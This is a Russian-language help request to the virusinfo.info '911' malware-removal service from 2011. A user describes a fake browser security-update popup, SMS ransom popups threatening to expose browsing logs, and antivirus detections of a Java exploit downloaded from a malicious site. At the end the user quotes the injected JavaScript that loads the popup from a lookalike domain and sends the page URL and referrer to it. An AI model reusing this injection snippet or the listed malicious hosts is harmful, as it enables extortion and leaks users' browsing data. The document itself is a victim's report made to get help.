Всплывающее окно в браузерах (заявка №92848)
Пользователь обратился [URL=http://virusinfo.info/911test]в сервис 911[/URL], указав на следующие проблемы в работе его компьютера:
В браузере Opera появилось всплывающее окно с уведомлением об угрозе и предложением скачать обновление безопасности. В браузере FireFox появилось аналогичное окно. Я нажал в Opera согласиться после чего этот браузер повис и я завершил его работу. Вскоре после этого на всех сайтах стали появляться всплывающие окна следующего содержания:
zlo.rt.mipt.ru
Последний просмотр контента: 2011-06-28 23:21:23
Вход с ИП: **.***.*.** (мой ИП)
Город: *****(мой город)
Провайдер: **** (мой провайдер)
Оплатите, отправив смс с текстом 2262348568 на номер 3381.
Если смс не отправляется, отправьте смс
с тем же текстом на номер 3121.
Введите полученный в смс код:
Напоминание пропадет навсегда.
Вы можете закрыть данное напоминание нажав на кнопку закрыть
Напоминаем Вам, что Контент на нашем сайте платный и Вы подтвердили это согласившись с правилами. Ознакомившись с 10 бесплатными единицами контента, Вы так же просмотрели еще 0.
Если Вы не согласны оплатить, то мы готовы предоставить полные логи посещения нашего сайта, в котором с Вашего айпи был произведен вход и перед просмотром Вы ознакомились с правилами. Если Вы считаете, что логи принадлежат не Вам, сообщите по адресу [email protected]
СМС я естественно не отправлял а запустил проверку антивирусом. Антивирус ESET NOD 32 3.0.695.0 выдал нашел следующие угрозы:
28.06.2011 21:51:42 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.
28.06.2011 21:51:41 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован SAGE\Dima Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.
Однако после сканирования проблема не пропала. Сегодняшнее сканирование результатов не дало.
Что я еще заметил (вдруг пригодится):
плагин NoScript успешно блокирует всплывающие окна но это полумера.
вирус подгружает всплывающее окно следующим javascript'ом
<script>if(self==top){
document.write("<script src='http" +
(("https:" == document.location.protocol) ? "s" : "") +
"://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("QiGkg6f+UDO4hH0ZSZ74wGvxOOqU5PDPz8tqQ2su0IwFECbYdJ2PbWWLiTJaZF/p")+"&r="+escape(document.referrer)+"&u="+escape(document.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
Дата обращения: 30.06.2011 1:11:59
Номер заявки: [URL=http://virusinfo.info/911test/?action=case_show_directions&case_id=92848]92848[/URL]
